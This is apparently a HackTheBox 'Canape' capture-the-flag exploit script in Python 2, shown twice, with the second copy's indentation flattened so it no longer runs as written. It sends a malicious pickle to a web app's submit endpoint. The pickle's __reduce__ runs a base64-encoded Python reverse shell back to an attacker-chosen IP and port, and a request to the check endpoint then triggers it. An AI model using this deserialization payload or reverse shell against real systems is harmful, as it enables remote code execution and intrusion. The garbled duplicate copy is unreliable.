fasetto/htb-canape.pwn.py

## htb-canape.pwn.py
import sys
import requests
import cPickle
from base64 import b64encode
from hashlib import md5

if len(sys.argv) < 2:
    print "[*] usage: pwn.py <ip> <port>"
    sys.exit(0)

IP = sys.argv[1]
PORT = sys.argv[2]

SHELL = '''python -c "import os;import pty;import socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(('%s',%i));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/bash');"''' % (IP, int(PORT))

canape = "http://10.10.10.70/%s"

class PickleRCE(object):
    def __reduce__(self):
        import os
        return (os.system,("echo %s | base64 -d |bash" % b64encode(SHELL),))

def send_payload():
    host = canape % "submit"
    payload = cPickle.dumps(PickleRCE()) + "homer"
    post_data = { "character": payload, "quote": "nothing" }
    # print "[*] Payload: %s" % payload

    try:
        res = requests.post(host, data=post_data, timeout=5)
        print "[*] Payload successfuly sent."

    except requests.exceptions.ConnectTimeout or requests.exceptions.ConnectionError:
        print "[!] Error: something happend with connection."
        sys.exit(1)

    character = post_data["character"]
    quote = post_data["quote"]
    file_id = md5(character + quote).hexdigest()

    return file_id

def check(id):
    host = canape % "check"
    post_data = { "id": id }
    res = None

    try:
        res = requests.post(host, data=post_data, timeout=2)
    except requests.exceptions.ReadTimeout:
        print "[+] Shell session opened."
        sys.exit(0)
    return res.status_code

file_id = send_payload()
print "[+] id: %s" % file_id

response = check(file_id)
print "[+] Status: %i" % response
	import sys
	import requests
	import cPickle
	from base64 import b64encode
	from hashlib import md5

	if len(sys.argv) < 2:
	print "[*] usage: pwn.py <ip> <port>"
	sys.exit(0)

	IP = sys.argv[1]
	PORT = sys.argv[2]

	SHELL = '''python -c "import os;import pty;import socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(('%s',%i));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/bash');"''' % (IP, int(PORT))

	canape = "http://10.10.10.70/%s"

	class PickleRCE(object):
	def __reduce__(self):
	import os
	return (os.system,("echo %s \| base64 -d \|bash" % b64encode(SHELL),))

	def send_payload():
	host = canape % "submit"
	payload = cPickle.dumps(PickleRCE()) + "homer"
	post_data = { "character": payload, "quote": "nothing" }
	# print "[*] Payload: %s" % payload

	try:
	res = requests.post(host, data=post_data, timeout=5)
	print "[*] Payload successfuly sent."

	except requests.exceptions.ConnectTimeout or requests.exceptions.ConnectionError:
	print "[!] Error: something happend with connection."
	sys.exit(1)

	character = post_data["character"]
	quote = post_data["quote"]
	file_id = md5(character + quote).hexdigest()

	return file_id

	def check(id):
	host = canape % "check"
	post_data = { "id": id }
	res = None

	try:
	res = requests.post(host, data=post_data, timeout=2)
	except requests.exceptions.ReadTimeout:
	print "[+] Shell session opened."
	sys.exit(0)
	return res.status_code

	file_id = send_payload()
	print "[+] id: %s" % file_id

	response = check(file_id)
	print "[+] Status: %i" % response